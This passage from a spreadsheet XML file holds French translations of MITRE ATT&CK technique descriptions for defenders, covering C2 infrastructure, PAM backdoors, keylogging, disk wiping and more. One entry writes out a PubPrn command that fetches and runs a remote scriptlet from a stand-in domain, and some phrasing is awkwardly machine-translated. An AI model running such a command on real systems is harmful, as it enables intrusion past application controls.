  </si>
  <si>
    <t>Les adversaires peuvent acheter et configurer une infrastructure cloud sans serveur, telle que Cloudflare Workers, des fonctions AWS Lambda ou des scripts Google Apps, qui peuvent être utilisées lors du ciblage. En utilisant une infrastructure sans serveur, les adversaires peuvent rendre plus difficile l’attribution de l’infrastructure utilisée pendant les opérations.
Une fois acquis, l’environnement d’exécution sans serveur peut être exploité pour répondre directement aux machines infectées ou au trafic [Proxy](https://attack.mitre.org/techniques/T1090) vers un serveur de commande et de contrôle appartenant à l’adversaire. (Citation : BlackWater Malware Cloudflare Workers)(Référence : redirecteur AWS Lambda)(Citation : GWS Apps Script Abuse 2021) Étant donné que le trafic généré par ces fonctions semblera provenir de sous-domaines de fournisseurs de cloud courants, il peut être difficile de distinguer le trafic ordinaire destiné à ces fournisseurs, ce qui facilite l’utilisation de [Masquer l’infrastructure](https://attack.mitre.org/techniques/T1665). (Citation : Détection de la commande et du contrôle dans le cloud)(Citation : BlackWater Malware Cloudflare Workers)
https://attack.mitre.org/techniques/T1583/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent coder les données à l’aide d’un système de codage de données standard pour rendre le contenu du trafic de commande et de contrôle plus difficile à détecter. Les informations de commande et de contrôle (C2) peuvent être codées à l’aide d’un système de codage de données standard qui adhère aux spécifications de protocole existantes. Les schémas de codage de données courants incluent ASCII, Unicode, hexadécimal, Base64 et MIME. (Citation : Wikipédia Binary-to-text Encoding)(citation : Codage des caractères de Wikipédia) Certains systèmes d’encodage de données peuvent également entraîner une compression de données, tels que gzip.
https://attack.mitre.org/techniques/T1132/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent intégrer des charges utiles dans d’autres fichiers pour dissimuler le contenu malveillant aux défenses. Sinon, des fichiers apparemment inoffensifs (tels que des scripts et des exécutables) peuvent être utilisés à mauvais escient pour transporter et obscurcir des charges utiles et du contenu malveillants. Dans certains cas, les charges utiles intégrées peuvent également permettre aux adversaires de [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) sans affecter les contrôles d’exécution tels que les signatures numériques et les tickets de notarisation. (Citation : Laboratoires Sentinelle) 
Les adversaires peuvent intégrer des charges utiles dans différents formats de fichier pour masquer les charges utiles. (Citation : Microsoft Learn) Ceci est similaire à la [Steganographie](https://attack.mitre.org/techniques/T1027/003), mais n’implique pas de tisser du contenu malveillant en octets et motifs spécifiques liés à des formats de médias numériques légitimes. (Citation : GitHub PSImage) 
Par exemple, des adversaires ont été observés en train d’intégrer des charges utiles dans un binaire autrement bénin ou en tant que superposition de celui-ci. (Citation : securelist dtrack2) Des adversaires ont également été observés en train d’imbriquer des charges utiles (telles que des exécutables et des scripts d’exécution seule) dans un fichier du même format. (Citation : SentinelLabs inversant les applescripts en run-only 2021) 
Le contenu intégré peut également être utilisé comme charges utiles [Injection de processus](https://attack.mitre.org/techniques/T1055) utilisées pour infecter des processus système inoffensifs. (Citation : Trend Micro) Ces charges utiles intégrées puis injectées peuvent être utilisées dans le cadre de modules de logiciels malveillants conçus pour fournir des fonctionnalités spécifiques telles que le chiffrement des communications C2 à l’appui d’un module d’orchestration. Par exemple, un module embarqué peut être injecté dans les navigateurs par défaut, permettant aux adversaires de communiquer ensuite via le réseau. (Citation : Rapport d’analyse des logiciels malveillants ComRAT)
https://attack.mitre.org/techniques/T1027/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les modules d’authentification enfichables (PAM) pour accéder aux informations d’identification de l’utilisateur ou permettre un accès injustifié aux comptes. PAM est un système modulaire de fichiers de configuration, de bibliothèques et de fichiers exécutables qui guident l’authentification pour de nombreux services. Le module d’authentification le plus courant est &lt;code&gt;pam_unix.so&lt;/code&gt;, qui récupère, définit et vérifie les informations d’authentification de compte dans &lt;code&gt;/etc/passwd&lt;/code&gt; et &lt;code&gt;/etc/shadow&lt;/code&gt;. (Citation : Apple PAM)(Citation : Man Pam_Unix)(Citation : Red Hat PAM)
Les adversaires peuvent modifier des composants du système PAM pour créer des portes dérobées. Les composants PAM, tels que &lt;code&gt;pam_unix.so&lt;/code&gt;, peuvent être corrigés pour accepter des valeurs arbitraires fournies par l’adversaire comme informations d’identification légitimes. (Citation : PAM Backdoor)
Les modifications malveillantes apportées au système PAM peuvent également être utilisées de manière abusive pour voler des informations d’identification. Les adversaires peuvent infecter les ressources PAM avec du code pour collecter les informations d’identification de l’utilisateur, car les valeurs échangées avec les composants PAM peuvent être en texte brut puisque PAM ne stocke pas les mots de passe. (Citation : PAM Creds)(Citation : Apple PAM)
https://attack.mitre.org/techniques/T1556/003</t>
  </si>
  <si>
    <t>Un adversaire peut annuler les modifications apportées à une instance cloud après avoir effectué des activités malveillantes dans le but d’échapper à la détection et de supprimer les preuves de sa présence. Dans les environnements hautement virtualisés, tels que les infrastructures basées sur le cloud, cela peut être accompli en restaurant des instantanés de machine virtuelle (VM) ou de stockage de données via le tableau de bord de gestion du cloud ou des API cloud.
Une autre variante de cette technique consiste à utiliser un stockage temporaire attaché à l’instance de calcul. La plupart des fournisseurs de cloud proposent différents types de stockage, notamment persistant, local et/ou éphémère, les types éphémères étant souvent réinitialisés lors de l’arrêt/redémarrage de la machine virtuelle. (Citation : Tech Republic - Restaurer les instantanés AWS)(Citation : Google - Restaurer l’instantané du cloud)
https://attack.mitre.org/techniques/T1578/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les hôtes de la victime qui peuvent être utilisées lors du ciblage. Les informations sur les hôtes peuvent inclure une variété de détails, y compris des données administratives (par exemple, nom, adresse IP attribuée, fonctionnalité, etc.) ainsi que des détails concernant sa configuration (par exemple : système d’exploitation, langue, etc.).
Les adversaires peuvent collecter ces informations de différentes manières, par exemple par le biais d’une [analyse active](https://attack.mitre.org/techniques/T1595) ou d’un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les hôtes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[services à distance externes](https://attack.mitre.org/techniques/T1133)).
Les adversaires peuvent également collecter des informations sur l’hôte de la victime via des en-têtes HTTP User-Agent, qui sont envoyés à un serveur pour identifier l’application, le système d’exploitation, le fournisseur et/ou la version de l’agent utilisateur demandeur. Cela peut être utilisé pour éclairer l’action de suivi de l’adversaire. Par exemple, les adversaires peuvent vérifier les agents utilisateurs pour le système d’exploitation demandeur, puis ne diffuser des logiciels malveillants que pour les systèmes d’exploitation cibles tout en ignorant les autres. (Citation : TrellixQakbot)
https://attack.mitre.org/techniques/T1592</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des données de certificat numérique publiques pour obtenir des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les certificats numériques sont émis par une autorité de certification (CA) afin de vérifier cryptographiquement l’origine du contenu signé. Ces certificats, tels que ceux utilisés pour le trafic Web chiffré (communications HTTPS SSL/TLS), contiennent des informations sur l’organisation enregistrée, telles que le nom et l’emplacement.
Les adversaires peuvent rechercher des données de certificat numérique pour recueillir des informations exploitables. Les auteurs de menace peuvent utiliser des ressources en ligne et des outils de recherche pour recueillir des informations sur les certificats. (Citation : SSLShopper Lookup) Les données de certificat numérique peuvent également être disponibles à partir d’artefacts signés par l’organisation (par exemple, les certificats utilisés à partir du trafic Web chiffré sont servis avec du contenu). (Citation : Certificat SSL moyen) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Phishing pour obtenir de l’information](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer les frappes au clavier de l’utilisateur pour intercepter les informations d’identification au fur et à mesure que l’utilisateur les saisit. L’enregistrement de frappe est susceptible d’être utilisé pour acquérir des informations d’identification pour de nouvelles opportunités d’accès lorsque les efforts de [déchargement des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) ne sont pas efficaces et peuvent nécessiter qu’un adversaire intercepte les frappes au clavier sur un système pendant une période de temps importante avant que les informations d’identification ne puissent être capturées avec succès. Afin d’augmenter la probabilité de capturer rapidement les informations d’identification, un adversaire peut également effectuer des actions telles que l’effacement des cookies du navigateur pour forcer les utilisateurs à se réauthentifier auprès des systèmes. (Référence : Talos Kimsuky, novembre 2021)
L’enregistrement de frappe est le type de capture d’entrée le plus répandu, avec de nombreuses façons différentes d’intercepter les frappes au clavier. (Citation : Aventures d’une frappe) Certaines méthodes incluent :
* Callbacks de l’API de raccordement utilisés pour le traitement des frappes au clavier. Contrairement à [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), il se concentre uniquement sur les fonctions API destinées au traitement des données de frappe.
* Lecture des données brutes de frappe à partir de la mémoire tampon matérielle.
* Modifications du registre Windows.
* Pilotes personnalisés.
* [Modifier l’image système](https://attack.mitre.org/techniques/T1601) peut fournir aux adversaires des crochets dans le système d’exploitation des périphériques réseau pour lire les frappes brutes des sessions de connexion. (Citation : Blog Cisco Legacy Device Attacks)
https://attack.mitre.org/techniques/T1056/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de masquer leurs artefacts basés sur des fichiers en les écrivant dans des dossiers spécifiques ou des noms de fichiers exclus de l’analyse antivirus (AV) et d’autres fonctionnalités défensives. Les scanners antivirus et autres analyseurs basés sur des fichiers incluent souvent des exclusions pour optimiser les performances et faciliter l’installation et l’utilisation légitime des applications. Ces exclusions peuvent être contextuelles (par exemple, les analyses ne sont lancées qu’en réponse à des événements/alertes déclencheurs spécifiques), mais sont aussi souvent des chaînes codées en dur faisant référence à des dossiers et/ou des fichiers spécifiques supposés fiables et légitimes. (Citation : Exclusions de dossiers de fichiers Microsoft)
Les adversaires peuvent abuser de ces exclusions pour masquer leurs artefacts basés sur des fichiers. Par exemple, plutôt que de modifier les paramètres de l’outil pour ajouter une nouvelle exclusion (par exemple, [Désactiver ou modifier les outils](https://attack.mitre.org/techniques/T1562/001)), les adversaires peuvent supprimer leurs charges utiles basées sur des fichiers dans des exclusions par défaut ou autrement bien connues. Les adversaires peuvent également utiliser [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) et d’autres activités [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) pour découvrir et vérifier les exclusions existantes dans un environnement victime.
https://attack.mitre.org/techniques/T1564/012</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</si>
  <si>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La plupart des plates-formes Linux et basées sur Linux fournissent un ensemble standard de groupes d’autorisations (utilisateur, groupe et autres) et un ensemble standard d’autorisations (lecture, écriture et exécution) qui sont appliqués à chaque groupe. Bien que les nuances de l’implémentation des autorisations de chaque plate-forme puissent varier, la plupart des plates-formes fournissent deux commandes principales utilisées pour manipuler les ACL de fichiers et de répertoires : &lt;code&gt;chown&lt;/code&gt; (abréviation de change owner) et &lt;code&gt;chmod&lt;/code&gt; (abréviation de change mode).
Adversarial peut utiliser ces commandes pour se faire propriétaire de fichiers et de répertoires ou changer de mode si les autorisations actuelles le permettent. Ils pourraient par la suite empêcher d’autres personnes d’accéder au fichier. Des modifications spécifiques de fichiers et de répertoires peuvent être une étape nécessaire pour de nombreuses techniques, telles que l’établissement de la persistance via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) ou l’altération/détournement d’autres fichiers binaires/de configuration instrumentaux via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574). (Citation : 20 outils et techniques courants macOS)
https://attack.mitre.org/techniques/T1222/002</t>
  </si>
  <si>
    <t>Les adversaires qui n’ont aucune connaissance préalable des informations d’identification légitimes au sein du système ou de l’environnement peuvent deviner des mots de passe pour tenter d’accéder aux comptes. Sans connaître le mot de passe d’un compte, un adversaire peut choisir de deviner systématiquement le mot de passe à l’aide d’un mécanisme répétitif ou itératif. Un adversaire peut deviner les identifiants de connexion sans connaître au préalable les mots de passe du système ou de l’environnement au cours d’une opération à l’aide d’une liste de mots de passe courants. La supposition de mot de passe peut ou non prendre en compte les politiques de la cible en matière de complexité des mots de passe ou utiliser des stratégies qui peuvent verrouiller les comptes après un certain nombre de tentatives infructueuses.
Deviner les mots de passe peut être une option risquée, car elle peut entraîner de nombreux échecs d’authentification et de verrouillage de compte, en fonction des politiques d’échec de connexion de l’organisation. (Référence : Cylance Cleaver)
En règle générale, les services de gestion sur les ports couramment utilisés sont utilisés pour deviner les mots de passe.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 SNMP (161/UDP et 162/TCP/UDP)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De plus, les adversaires peuvent abuser des interfaces de périphériques réseau (telles que « wlanAPI ») pour forcer par force brute le(s) routeur(s) wifi(s) accessible(s) via des protocoles d’authentification sans fil. (Citation : Trend Micro Emotet 2020)
Dans les environnements par défaut, les tentatives de connexion LDAP et Kerberos sont moins susceptibles de déclencher des événements via SMB, ce qui crée l’événement d'« échec de connexion » Windows ID 4625.
https://attack.mitre.org/techniques/T1110/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser PubPrn pour l’exécution par proxy de fichiers distants malveillants. PubPrn.vbs est un script [Visual Basic](https://attack.mitre.org/techniques/T1059/005) qui publie une imprimante dans les services de domaine Active Directory. Le script peut être signé par Microsoft et est généralement exécuté via le [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via &lt;code&gt;Cscript.exe&lt;/code&gt;. Par exemple, le code suivant publie une imprimante dans le domaine spécifié : &lt;code&gt;cscript pubprn Printer1 LDAP ://CN=Container1,DC=Domain1,DC=Com&lt;/code&gt;. (Citation : pubprn)
Les adversaires peuvent abuser de PubPrn pour exécuter des charges utiles malveillantes hébergées sur des sites distants. (Citation : Enigma0x3 PubPrn Bypass) Pour ce faire, les adversaires peuvent définir le deuxième &lt;code&gt;paramètre script :&lt;/code&gt; pour référencer un fichier scriptlet (.sct) hébergé sur un site distant. Un exemple de commande est &lt;code&gt;pubprn.vbs 127.0.0.1 script :https ://mydomain.com/folder/file.sct&lt;/code&gt;. Ce comportement peut contourner les restrictions de validation de signature et les solutions de contrôle d’application qui ne tiennent pas compte de l’utilisation abusive de ce script.
Dans les versions ultérieures de Windows (10+), &lt;code&gt;PubPrn.vbs&lt;/code&gt; a été mis à jour pour empêcher l’exécution de proxy à partir d’un site distant. Cela se fait en limitant le protocole spécifié dans le deuxième paramètre à &lt;code&gt;LDAP://&lt;/code&gt;, au lieu du moniker &lt;code&gt;script :&lt;/code&gt; qui pourrait être utilisé pour référencer du code distant via HTTP(S).
https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter des informations techniques sur les victimes qui peuvent être utilisées lors du ciblage. Les informations sur les victimes peuvent être disponibles à l’achat dans des sources et des bases de données privées réputées, telles que des abonnements payants à des flux de bases de données d’analyse ou à d’autres services d’agrégation de données. Les adversaires peuvent également acheter des informations auprès de sources moins fiables, telles que le dark web ou les marchés noirs de la cybercriminalité.
Les adversaires peuvent acheter des informations sur leurs cibles déjà identifiées ou utiliser des données achetées pour découvrir des opportunités de violations réussies. Les auteurs de menace peuvent recueillir divers détails techniques à partir des données achetées, y compris, mais sans s’y limiter, les coordonnées des employés, les informations d’identification ou des détails concernant l’infrastructure d’une victime. (Citation : Données de vente ZDNET) Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing pour obtenir de l’information](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou d’accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Comptes valides](https://attack.mitre.org/techniques/T1078)).
https://attack.mitre.org/techniques/T1597/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de vider les informations d’identification pour obtenir des informations d’identification et de connexion au compte, généralement sous la forme d’un hachage ou d’un mot de passe en texte clair. Les informations d’identification peuvent être obtenues à partir des caches, de la mémoire ou des structures du système d’exploitation. (Citation : Brining MimiKatz à Unix) Les informations d’identification peuvent ensuite être utilisées pour effectuer [Mouvement latéral](https://attack.mitre.org/tactics/TA0008) et accéder à des informations restreintes.
Plusieurs des outils mentionnés dans les sous-techniques associées peuvent être utilisés à la fois par des adversaires et des testeurs de sécurité professionnels. D’autres outils personnalisés existent probablement aussi.
https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter des charges utiles malveillantes en chargeant des modules partagés. Les modules partagés sont des fichiers exécutables qui sont chargés dans des processus pour fournir un accès à du code réutilisable, tel que des fonctions personnalisées spécifiques ou l’appel de fonctions API du système d’exploitation (c’est-à-dire, [API native](https://attack.mitre.org/techniques/T1106)).
Les adversaires peuvent utiliser cette fonctionnalité comme un moyen d’exécuter des charges utiles arbitraires sur un système victime. Par exemple, les adversaires peuvent modulariser les fonctionnalités de leurs logiciels malveillants en objets partagés qui exécutent diverses fonctions telles que la gestion des communications réseau C2 ou l’exécution d’actions spécifiques sur objectif.
Le chargeur de modules Linux et macOS peut charger et exécuter des objets partagés à partir de chemins locaux arbitraires. Cette fonctionnalité réside dans 'dlfcn.h' dans des fonctions telles que 'dlopen' et 'dlsym'. Bien que macOS puisse exécuter des fichiers « .so », la pratique courante utilise des fichiers « .dylib ». (Citation : Apple Dev Dynamic Libraries)(Citation : Bibliothèques partagées Linux)(Citation : RotaJakiro 2021 analyse netlab360)(Citation : Unit42 OceanLotus 2017)
Le chargeur de module Windows peut recevoir l’instruction de charger des DLL à partir de chemins locaux arbitraires et de chemins réseau UNC (Universal Naming Convention) arbitraires. Cette fonctionnalité réside dans 'NTDLL.dll' et fait partie de l'[API native](https://attack.mitre.org/techniques/T1106) de Windows qui est appelée à partir de fonctions telles que 'LoadLibrary' au moment de l’exécution. (Citation : Microsoft DLL)
https://attack.mitre.org/techniques/T1129</t>
  </si>
  <si>
    <t>Les adversaires peuvent collecter des données relatives aux appareils gérés à partir de référentiels de configuration. Les référentiels de configuration sont utilisés par les systèmes de gestion pour configurer, gérer et contrôler les données sur des systèmes distants. Les référentiels de configuration peuvent également faciliter l’accès à distance et l’administration des appareils.
Les adversaires peuvent cibler ces référentiels afin de collecter de grandes quantités de données sensibles d’administration système. Les données des référentiels de configuration peuvent être exposées par divers protocoles et logiciels et peuvent stocker une grande variété de données, dont une grande partie peut s’aligner sur les objectifs de découverte de l’adversaire. (Référence : US-CERT-TA18-106A)(Référence : US-CERT TA17-156A SNMP Abuse 2017)
https://attack.mitre.org/techniques/T1602</t>
  </si>
  <si>
    <t>Les adversaires peuvent corrompre ou effacer les structures de données du disque dur d’un disque dur nécessaire au démarrage d’un système ; Cibler des systèmes critiques spécifiques ou en grand nombre dans un réseau pour interrompre la disponibilité des ressources système et réseau. 
Les adversaires peuvent tenter de rendre le système incapable de démarrer en écrasant les données critiques situées dans des structures telles que l’enregistrement de démarrage principal (MBR) ou la table de partition. (Référence : Symantec Shamoon 2012)(Citation : FireEye Shamoon novembre 2016)(Citation : Palo Alto Shamoon, novembre 2016)(Citation : Kaspersky StoneDrill 2017)(Citation : Unité 42 Shamoon3 2018) Les données contenues dans les structures de disque peuvent inclure le code exécutable initial pour le chargement d’un système d’exploitation ou l’emplacement des partitions du système de fichiers sur le disque. Si ces informations ne sont pas présentes, l’ordinateur ne sera pas en mesure de charger un système d’exploitation pendant le processus de démarrage, laissant l’ordinateur indisponible. [Effacement de la structure du disque](https://attack.mitre.org/techniques/T1561/002) peut être effectué de manière isolée ou en même temps que [Effacement du contenu du disque](https://attack.mitre.org/techniques/T1561/001) si tous les secteurs d’un disque sont effacés.
Sur les périphériques réseau, les adversaires peuvent reformater le système de fichiers à l’aide des commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'format'. (Référence : format_cmd_cisco)
Pour maximiser l’impact sur l’organisation cible, les programmes malveillants conçus pour détruire les structures de disque peuvent avoir des fonctionnalités de type ver pour se propager sur un réseau en exploitant d’autres techniques telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) et [Partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002). (Référence : Symantec Shamoon 2012)(Citation : FireEye Shamoon novembre 2016)(Citation : Palo Alto Shamoon, novembre 2016)(Citation : Kaspersky StoneDrill 2017)
https://attack.mitre.org/techniques/T1561/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de provoquer un déni de service (DoS) en envoyant directement un volume élevé de trafic réseau à une cible. Cette attaque DoS peut également réduire la disponibilité et la fonctionnalité du ou des systèmes et du réseau ciblés. [Inondation directe du réseau]Les (https://attack.mitre.org/techniques/T1498/001) sont lorsqu’un ou plusieurs systèmes sont utilisés pour envoyer un volume élevé de paquets réseau vers le réseau du service ciblé. Presque tous les protocoles réseau peuvent être utilisés pour l’inondation. Les protocoles sans état tels que UDP ou ICMP sont couramment utilisés, mais les protocoles avec état tels que TCP peuvent également être utilisés.
Les botnets sont couramment utilisés pour mener des attaques d’inondation de réseau contre les réseaux et les services. Les botnets de grande taille peuvent générer une quantité importante de trafic à partir de systèmes répartis sur l’Internet mondial. Les adversaires peuvent disposer des ressources nécessaires pour développer et contrôler leur propre infrastructure de botnet ou louer du temps sur un botnet existant pour mener une attaque. Dans certains des pires cas de DoS distribué (DDoS), tant de systèmes sont utilisés pour générer le flood que chacun n’a besoin d’envoyer qu’une petite quantité de trafic pour produire un volume suffisant pour saturer le réseau cible. Dans de telles circonstances, il devient extrêmement difficile de distinguer le trafic DDoS des clients légitimes. Les botnets ont été utilisés dans certaines des attaques DDoS flooding les plus médiatisées, telles que la série d’incidents de 2012 qui ont ciblé de grandes banques américaines. (Citation : USNYAG IranianBotnet mars 2016)
https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les variables d’environnement utilisées pour charger les bibliothèques. La variable d’environnement PATH contient une liste de répertoires (Utilisateur et Système) que le système d’exploitation parcourt séquentiellement à la recherche du binaire appelé à partir d’un script ou de la ligne de commande. 
Les adversaires peuvent placer un programme malveillant dans une entrée antérieure de la liste des répertoires stockés dans la variable d’environnement PATH, ce qui fait que le système d’exploitation exécute le binaire malveillant plutôt que le binaire légitime lorsqu’il effectue une recherche séquentielle dans cette liste PATH.
Par exemple, sous Windows, si un adversaire place un programme malveillant nommé « net.exe » dans 'C :\example path', qui précède par défaut 'C :\Windows\system32\net.exe' dans la variable d’environnement PATH, lorsque « net » est exécuté à partir de la ligne de commande, 'C :\example path' sera appelé à la place de l’exécutable légitime du système à 'C :\Windows\system32\net.exe. Certaines méthodes d’exécution d’un programme s’appuient sur la variable d’environnement PATH pour déterminer les emplacements recherchés lorsque le chemin d’accès du programme n’est pas indiqué, comme l’exécution de programmes à partir d’un [interpréteur de commandes et de scripts](https://attack.mitre.org/techniques/T1059). (Citation : ExpressVPN PATH env Windows 2021)
Les adversaires peuvent également modifier directement la variable $PATH en spécifiant les répertoires à rechercher.  Un adversaire peut modifier la variable '$PATH' pour qu’elle pointe vers un répertoire auquel il a un accès en écriture. Lorsqu’un programme utilisant la variable $PATH est appelé, le système d’exploitation recherche le répertoire spécifié et exécute le binaire malveillant. Sur macOS, cela peut également être effectué en modifiant la variable $HOME. Ces variables peuvent être modifiées à l’aide de la ligne de commande, de launchctl, de [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), ou en modifiant le contenu du dossier '/etc/paths.d'. (Citation : uptycs Fake POC linux malware 2023)(Citation : Variables PATH macOS nixCraft)(Citation : Elastic Rules macOS launchctl 2022)
https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent exploiter le référentiel SharePoint comme source pour extraire des informations précieuses. SharePoint contient souvent des informations utiles pour qu’un adversaire puisse en savoir plus sur la structure et les fonctionnalités du réseau et des systèmes internes. Par exemple, voici une liste d’exemples d’informations qui peuvent avoir une valeur potentielle pour un adversaire et qui peuvent également être trouvées sur SharePoint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https://attack.mitre.org/techniques/T1213/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent accéder directement à un volume pour contourner les contrôles d’accès aux fichiers et la surveillance du système de fichiers. Windows permet aux programmes d’avoir un accès direct aux volumes logiques. Les programmes disposant d’un accès direct peuvent lire et écrire des fichiers directement à partir du lecteur en analysant les structures de données du système de fichiers. Cette technique peut contourner les contrôles d’accès aux fichiers Windows ainsi que les outils de surveillance du système de fichiers. (Citation : Hakobyan 2009)
Des utilitaires, tels que « NinjaCopy », existent pour effectuer ces actions dans PowerShell. (Citation : github powersploit ninjacopy) Les adversaires peuvent également utiliser des utilitaires intégrés ou tiers (tels que 'vssadmin', 'wbadmin' et [esentutl](https://attack.mitre.org/software/S0404)) pour créer des clichés instantanés ou des sauvegardes de données à partir de volumes système. (Citation : LOLBAS Esentutl)
https://attack.mitre.org/techniques/T1006</t>
  </si>
  <si>
    <t>Les adversaires peuvent avoir accès à des outils d’intelligence artificielle générative, tels que les grands modèles de langage (LLM), pour faciliter diverses techniques de ciblage. Ces outils peuvent être utilisés pour informer, renforcer et permettre diverses tâches malveillantes, notamment la réalisation de [Reconnaissance](https://attack.mitre.org/tactics/TA0043), la création de scripts de base, l’assistance à l’ingénierie sociale et même le développement de charges utiles. (Référence : MSFT-AI)
Par exemple, en utilisant un LLM accessible au public, un adversaire externalise ou automatise essentiellement certaines tâches à l’outil. À l’aide de l’IA, l’adversaire peut rédiger et générer du contenu dans diverses langues écrites à utiliser dans les campagnes [d’hameçonnage](https://attack.mitre.org/techniques/T1566)/[d’hameçonnage à titre d’information](https://attack.mitre.org/techniques/T1598). Le même outil accessible au public peut permettre d’autres recherches sur les vulnérabilités ou d’autres recherches offensives soutenant [Développer des capacités](https://attack.mitre.org/techniques/T1587). Les outils d’IA peuvent également automatiser des tâches techniques en générant, affinant ou améliorant de toute autre manière (par exemple, [Fichiers ou informations obfusqués](https://attack.mitre.org/techniques/T1027)) des scripts et des charges utiles malveillants. (Citation : OpenAI-CTI)
https://attack.mitre.org/techniques/T1588/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de modifier les structures hiérarchiques dans les environnements d’infrastructure en tant que service (IaaS) afin d’échapper aux défenses.  
Les environnements IaaS regroupent souvent les ressources dans une hiérarchie, ce qui permet d’améliorer la gestion des ressources et l’application des politiques aux groupes concernés. Les structures hiérarchiques diffèrent d’un fournisseur de cloud à l’autre. Par exemple, dans les environnements AWS, plusieurs comptes peuvent être regroupés sous une seule organisation, tandis que dans les environnements Azure, plusieurs abonnements peuvent être regroupés sous un seul groupe de gestion. (Référence : AWS Organizations)(Citation : Ressources Microsoft Azure)
Les adversaires peuvent ajouter, supprimer ou modifier des groupes de ressources au sein d’une hiérarchie IaaS. Par exemple, dans les environnements Azure, un adversaire qui a obtenu l’accès à un compte d’administrateur général peut créer des abonnements dans lesquels déployer des ressources. Ils peuvent également se livrer au détournement d’abonnement en transférant un abonnement à l’utilisation existant d’un locataire victime à un locataire contrôlé par l’adversaire. Cela permettra à l’adversaire d’utiliser les ressources de calcul de la victime sans générer de journaux sur le locataire victime. (Citation : Microsoft Peach Sandstorm 2023)(Citation : Détournement d’abonnement Microsoft 2022)
Dans les environnements AWS, les adversaires disposant des autorisations appropriées dans un compte donné peuvent appeler l’API « LeaveOrganization », ce qui entraîne la séparation du compte de l’organisation AWS à laquelle il était lié et supprime toutes les politiques de contrôle de service, les garde-fous ou les restrictions qui lui sont imposés par son ancienne organisation. Les adversaires peuvent également appeler l’API « CreateAccount » afin de créer un nouveau compte au sein d’une organisation AWS. Ce compte utilisera les mêmes méthodes de paiement que celles enregistrées sur le compte de paiement, mais ne sera peut-être pas soumis aux détections ou aux politiques de contrôle de service existantes. (Référence : AWS RE :Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1666</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des règles de messagerie pour masquer les e-mails entrants dans la boîte aux lettres d’un utilisateur compromis. De nombreux clients de messagerie permettent aux utilisateurs de créer des règles de boîte de réception pour diverses fonctions de messagerie, notamment le déplacement des e-mails vers d’autres dossiers, le marquage des e-mails comme lus ou la suppression d’e-mails. Les règles peuvent être créées ou modifiées dans les clients de messagerie ou par le biais de fonctionnalités externes telles que les applets de commande &lt;code&gt;New-InboxRule&lt;/code&gt; ou &lt;code&gt;Set-InboxRule&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) sur les systèmes Windows. (Citation : Règles de boîte de réception Microsoft)(Citation : Règles de messagerie MacOS)(Citation : Microsoft New-InboxRule)(Citation : Microsoft Set-InboxRule)
Les adversaires peuvent utiliser des règles de messagerie dans la boîte aux lettres d’un utilisateur compromis pour supprimer et/ou déplacer des e-mails vers des dossiers moins visibles. Les adversaires peuvent le faire pour masquer les alertes de sécurité, les communications C2 ou les réponses aux e-mails [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) envoyés à partir du compte compromis.
